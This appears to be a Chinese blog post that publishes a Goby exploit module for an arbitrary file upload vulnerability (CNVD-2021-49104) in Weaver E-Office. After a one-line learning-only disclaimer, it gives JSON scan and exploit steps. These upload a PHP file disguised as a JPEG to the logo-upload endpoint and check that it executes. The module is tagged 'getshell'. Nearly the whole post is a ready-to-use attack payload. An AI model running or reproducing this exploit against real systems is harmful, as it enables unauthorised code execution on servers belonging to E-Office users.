泛微任意文件上传（CNVD-2021-49104）

最新推荐文章于 2024-06-20 08:57:48 发布

aetkrad

最新推荐文章于 2024-06-20 08:57:48 发布

阅读量4.9k

点赞数

分类专栏： exp 文章标签： exp goby 泛微漏洞 CNVD-2021-49104

本文链接：https://blog.csdn.net/cch139745/article/details/121638921

版权

exp 专栏收录该内容

10 篇文章 0 订阅

订阅专栏

CNVD-2021-49104 goby exp

声明
代码
poc集合

声明

本程序仅供于学习交流，请使用者遵守《中华人民共和国网络安全法》，勿将此脚本用于非授权的测试，脚本开发者不负任何连带法律责任。

代码

{
      "Name": "泛微 EOffice Arbitrary File Upload CNVD-2021-49104",
      "Level": "3",
      "Tags": [
            "getshell"
      ],
      "GobyQuery": "(app=\"泛微-EOffice\" | app=\"EOffice\")",
      "Description": "泛微 EOffice 存在任意文件上传",
      "Product": "https://www.weaver.com.cn/",
      "Homepage": "https://gobies.org/",
      "Author": "aetkrad",
      "Impact": "",
      "Recommendation": "",
      "References": [
            "https://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247486095&idx=1&sn=950550f05795d6ae64842a2f3a5b0eca"
      ],
      "HasExp": true,
      "ExpParams": null,
      "ExpTips": {
            "Type": "",
            "Content": ""
      },
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=",
                        "follow_redirect": false,
                        "header": {
                              "Content-Type": "multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4"
                        },
                        "data_type": "text",
                        "data": "--e64bdf16c554bbc109cecef6451c26a4\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"test.php\"\nContent-Type: image/jpeg\n\n<?php\nprint \"test\";\n?>\n\n--e64bdf16c554bbc109cecef6451c26a4--",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "logo-eoffice.php",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|define||访问"
                  ]
            },
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/images/logo/logo-eoffice.php",
                        "follow_redirect": false,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "test",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody|regex|"
                  ]
            }
      ],
      "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=",
                        "follow_redirect": false,
                        "header": {
                              "Content-Type": "multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4"
                        },
                        "data_type": "text",
                        "data": "--e64bdf16c554bbc109cecef6451c26a4\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"test1.php\"\nContent-Type: image/jpeg\n\n<?php\nphpinfo();\n?>\n\n--e64bdf16c554bbc109cecef6451c26a4--",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "logo-eoffice.php",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|define||/images/logo/logo-eoffice.php"
                  ]
            }
      ],
      "PostTime": "2021-11-29 10:13:59",
      "GobyVersion": "1.9.310"
}